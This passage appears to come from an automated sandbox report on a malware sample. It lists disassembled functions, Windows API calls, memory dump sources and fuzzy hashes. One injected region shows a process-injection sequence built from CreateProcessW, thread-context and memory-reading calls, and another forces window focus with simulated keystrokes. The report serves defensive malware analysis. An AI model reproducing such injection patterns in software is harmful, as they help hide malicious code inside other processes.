                                                                                          • API ID: __lock_file_memset
                                                                                          • String ID:
                                                                                          • API String ID: 26237723-0
                                                                                          • Opcode ID: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                                                                          • Instruction ID: c8a12bf2a45d0ac11074f8cac28b928f9e20b60047ac9024d749846706a082ab
                                                                                          • Opcode Fuzzy Hash: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                                                                          • Instruction Fuzzy Hash: 32012971C00609FBCF22AF65DC029DF3B31AF44714F04815BF82416261D7798AA2DF99
                                                                                          Function 00414E94 Relevance: 3.0, APIs: 2, Instructions: 39COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                            • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                          • __lock_file.LIBCMT ref: 00414EE4
                                                                                            • Part of subcall function 00415965: __lock.LIBCMT ref: 0041598A
                                                                                          • __fclose_nolock.LIBCMT ref: 00414EEE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: __decode_pointer__fclose_nolock__getptd_noexit__lock__lock_file
                                                                                          • String ID:
                                                                                          • API String ID: 717694121-0
                                                                                          • Opcode ID: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                                                                          • Instruction ID: 225a509e04b880138f2478077c57af59103cae2c072c29012e7845c0956b1514
                                                                                          • Opcode Fuzzy Hash: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                                                                          • Instruction Fuzzy Hash: DEF06270D0470499C721BB6A9802ADE7AB0AFC1338F21864FE479A72D1C77C46C29F5D
                                                                                          Function 004098B8 Relevance: 3.0, APIs: 2, Instructions: 32windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • TranslateMessage.USER32(?), ref: 004098F6
                                                                                          • DispatchMessageW.USER32(?), ref: 00409901
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$DispatchTranslate
                                                                                          • String ID:
                                                                                          • API String ID: 1706434739-0
                                                                                          • Opcode ID: 743ba5b075e4e96b6aa8f27e888cbbcb244a1ef3297f43ff84cf2107d4412f6a
                                                                                          • Instruction ID: 6b3a2aeb923af73eb4cdb1bab797699f2cf27729a5018e8568c19fb4e3feaf67
                                                                                          • Opcode Fuzzy Hash: 743ba5b075e4e96b6aa8f27e888cbbcb244a1ef3297f43ff84cf2107d4412f6a
                                                                                          • Instruction Fuzzy Hash: D4F05471114301AEDA24DBE58D41B5BB3A8AFD8700F408C2EBA51E61C1FBF8E404C76A
                                                                                          Function 004098B6 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • TranslateMessage.USER32(?), ref: 004098F6
                                                                                          • DispatchMessageW.USER32(?), ref: 00409901
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$DispatchTranslate
                                                                                          • String ID:
                                                                                          • API String ID: 1706434739-0
                                                                                          • Opcode ID: fb629fc6ca96518639a0c0a81923e3da878f7f29ff55e6bd70df59113b88f2fd
                                                                                          • Instruction ID: cc4909b6a78c34842ee59a7900970f574117f06624f4f9c7373c79b1fb9dfc76
                                                                                          • Opcode Fuzzy Hash: fb629fc6ca96518639a0c0a81923e3da878f7f29ff55e6bd70df59113b88f2fd
                                                                                          • Instruction Fuzzy Hash: DDF054B1114301AADA14DBE58D41B5BB3A4AF94740F408C2EBA11E52C1EBFCD504C71A
                                                                                          Function 040E4D4D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 040E550B
                                                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 040E55A1
                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 040E55C3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1425973237.00000000040E3000.00000040.00000020.00020000.00000000.sdmp, Offset: 040E3000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_40e3000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 2438371351-0
                                                                                          • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                                          • Instruction ID: 3c11f01699059cdd787b519045bf9765a066da5a371ef1a1014e50996bb32620
                                                                                          • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                                          • Instruction Fuzzy Hash: 1A12EE20E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A4E77A5F91CF5A
                                                                                          Function 00410D40 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 544645111-0
                                                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                          • Instruction ID: fb1d736feddc8336b94c661b4f3a99b04f66f7614ca83ae43ac4a02a862e88ab
                                                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                          • Instruction Fuzzy Hash: 1331D574A00105DFC718DF99E490AAAFBA6FB49304B2486A6E409CB751D774EDC1CBC5
                                                                                          Function 004092C0 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0d8ad4d875158e0120ed104e09085659f42b86f6d600f5d33fa38308f41241bf
                                                                                          • Instruction ID: 573dba848690e0cdfd4c9be45b5663ff9194aa529e9341154cf92adfcd841cf8
                                                                                          • Opcode Fuzzy Hash: 0d8ad4d875158e0120ed104e09085659f42b86f6d600f5d33fa38308f41241bf
                                                                                          • Instruction Fuzzy Hash: 5E11C374200200ABC7249FAAD8D5F2A73A5AF45304B244C6FE845E7392D73CEC81EB5E
                                                                                          Function 00401108 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProcWindow
                                                                                          • String ID:
                                                                                          • API String ID: 181713994-0
                                                                                          • Opcode ID: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                                          • Instruction ID: 72bdf1ad184d721e15e17473fba0dc1faec6c1a9a9d1f3fcb71c15abd8c9f185
                                                                                          • Opcode Fuzzy Hash: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                                          • Instruction Fuzzy Hash: FDF05436700118A7DF38995CE89ACFF632AD7ED350F418227FD152B3A6813C5C41966E
                                                                                          Function 0041AA31 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0041AA46
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 10892065-0
                                                                                          • Opcode ID: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                                          • Instruction ID: 99ddfbee892492b32903703907324a593b21f4d4a70cf9c354be63060b8faba1
                                                                                          • Opcode Fuzzy Hash: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                                          • Instruction Fuzzy Hash: 56D05E325543449EDF009F71AC087663FDCE788395F008836BC1CC6150E778C950CA08
                                                                                          Function 00444343 Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00444326: SetFilePointerEx.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,?,0044434E,?,?,00429A83,?,00487174,00000003,0040DFEE,?), ref: 004442F3
                                                                                          • WriteFile.KERNELBASE(?,?,00000001,?,00000000,?,?,00429A83,?,00487174,00000003,0040DFEE,?,?,00000001,00403843), ref: 00444362
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$PointerWrite
                                                                                          • String ID:
                                                                                          • API String ID: 539440098-0
                                                                                          • Opcode ID: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                                                                                          • Instruction ID: 4a339a6eb5dfef6003722c1615037f540bc53d76d7f4c43935d02bdd90bbdfc9
                                                                                          • Opcode Fuzzy Hash: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                                                                                          • Instruction Fuzzy Hash: 7CE09275104311AFD250DF54D944F9BB3F8AF88714F108D0EF59587241D7B4A9848BA6
                                                                                          Function 0040116E Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProcWindow
                                                                                          • String ID:
                                                                                          • API String ID: 181713994-0
                                                                                          • Opcode ID: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                                          • Instruction ID: 4c36cba44089d0e03573cc5e8dee84df23505be31ebc2729507753268ee0d302
                                                                                          • Opcode Fuzzy Hash: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                                          • Instruction Fuzzy Hash: C3C08C72100008BB8700DE04EC44CFBB72CEBD8310700C20BBC0586201C230885097A1
                                                                                          Function 00414E06 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: __wfsopen
                                                                                          • String ID:
                                                                                          • API String ID: 197181222-0
                                                                                          • Opcode ID: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                                          • Instruction ID: 6225ca515e7db1e5d7746fb8cf1e0ad45b41b4d1817cc5a1d8a93eb941133566
                                                                                          • Opcode Fuzzy Hash: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                                          • Instruction Fuzzy Hash: EDC09B7644010C77CF122943FC02E453F1997C0764F044011FB1C1D561D577D5619589
                                                                                          Function 0040D900 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CloseHandle.KERNELBASE(00000000,?,0040DF8E), ref: 0040D91D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandle
                                                                                          • String ID:
                                                                                          • API String ID: 2962429428-0
                                                                                          • Opcode ID: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                                                                          • Instruction ID: 397672216df932ca6c22f29d52987cd2165f63c791f69eb8015935d900cfb6d9
                                                                                          • Opcode Fuzzy Hash: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                                                                          • Instruction Fuzzy Hash: 16E0DEB5900B019EC7318F6AE544416FBF8AEE46213248E2FD4E6D2A64D3B4A5898F54
                                                                                          Function 040E5D50 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • Sleep.KERNELBASE(000001F4), ref: 040E5D61
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1425973237.00000000040E3000.00000040.00000020.00020000.00000000.sdmp, Offset: 040E3000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_40e3000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Sleep
                                                                                          • String ID:
                                                                                          • API String ID: 3472027048-0
                                                                                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                          • Instruction ID: ef8a4ef5773a4d7433b6e9576cf483eb9d29b6479250e4ca25b403d22f1b47b3
                                                                                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                          • Instruction Fuzzy Hash: 40E0E67494410DEFDB00EFF4D94D6AE7FB4EF04301F100561FD01E2280D6309D608A62

                                                                                          Non-executed Functions

                                                                                          Function 0047C08E Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 676windowkeyboardCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C158
                                                                                          • DefDlgProcW.USER32(?,0000004E,?,?,004A83D8,?,004A83D8,?), ref: 0047C173
                                                                                          • GetKeyState.USER32(00000011), ref: 0047C1A4
                                                                                          • GetKeyState.USER32(00000009), ref: 0047C1AD
                                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C1C0
                                                                                          • GetKeyState.USER32(00000010), ref: 0047C1CA
                                                                                          • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C1DE
                                                                                          • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C20A
                                                                                          • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C22D
                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047C2D6
                                                                                          • SendMessageW.USER32 ref: 0047C2FB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$State$LongProcWindow
                                                                                          • String ID: @GUI_DRAGID$F
                                                                                          • API String ID: 1562745308-4164748364
                                                                                          • Opcode ID: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                                          • Instruction ID: f40edf6d5039c675f00343e7880f865f139be9e64e9b8d530a61de5f06f6045f
                                                                                          • Opcode Fuzzy Hash: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                                          • Instruction Fuzzy Hash: C6429F702042019FD714CF54C884FAB77A5EB89B04F548A6EFA48AB291DBB4EC45CB5A
                                                                                          Function 004045E0 Relevance: 46.9, Strings: 35, Instructions: 3193COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: PF$'|G$*"D$*vG$+%F$0wE$2G$5CG$7eF$<HF$<G$ApG$DvE$GSG$IqE$K@G$LbF$MdF$NgF$PIF$YtG$^[F$_?G$b"D$i}G$j)F$kQG$lE$rTG$vjE$}eE$*F$3G$_G$wG
                                                                                          • API String ID: 0-3772701627
                                                                                          • Opcode ID: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                                                                          • Instruction ID: b1e67458769bbea4a86cd8903524db5b6e79558e2e7ab8c51025fc7bd56032a7
                                                                                          • Opcode Fuzzy Hash: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                                                                          • Instruction Fuzzy Hash: 118366F1905B409FC351DFAAF984605BAE1F3AA3157A2857FC5088B731D7B8194A8F4C
                                                                                          Function 004375B0 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 126threadkeyboardwindowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetForegroundWindow.USER32(00000000,?,?,004448AF,?), ref: 004375B3
                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004375D8
                                                                                          • IsIconic.USER32(?), ref: 004375E1
                                                                                          • ShowWindow.USER32(?,00000009,?,?,004448AF,?), ref: 004375EE
                                                                                          • SetForegroundWindow.USER32(?), ref: 004375FD
                                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00437615
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00437619
                                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00437624
                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437632
                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437638
                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 0043763E
                                                                                          • SetForegroundWindow.USER32(?), ref: 00437645
                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437654
                                                                                          • keybd_event.USER32(00000012,00000000), ref: 0043765D
                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043766B
                                                                                          • keybd_event.USER32(00000012,00000000), ref: 00437674
                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437682
                                                                                          • keybd_event.USER32(00000012,00000000), ref: 0043768B
                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437699
                                                                                          • keybd_event.USER32(00000012,00000000), ref: 004376A2
                                                                                          • SetForegroundWindow.USER32(?), ref: 004376AD
                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376CD
                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D3
                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
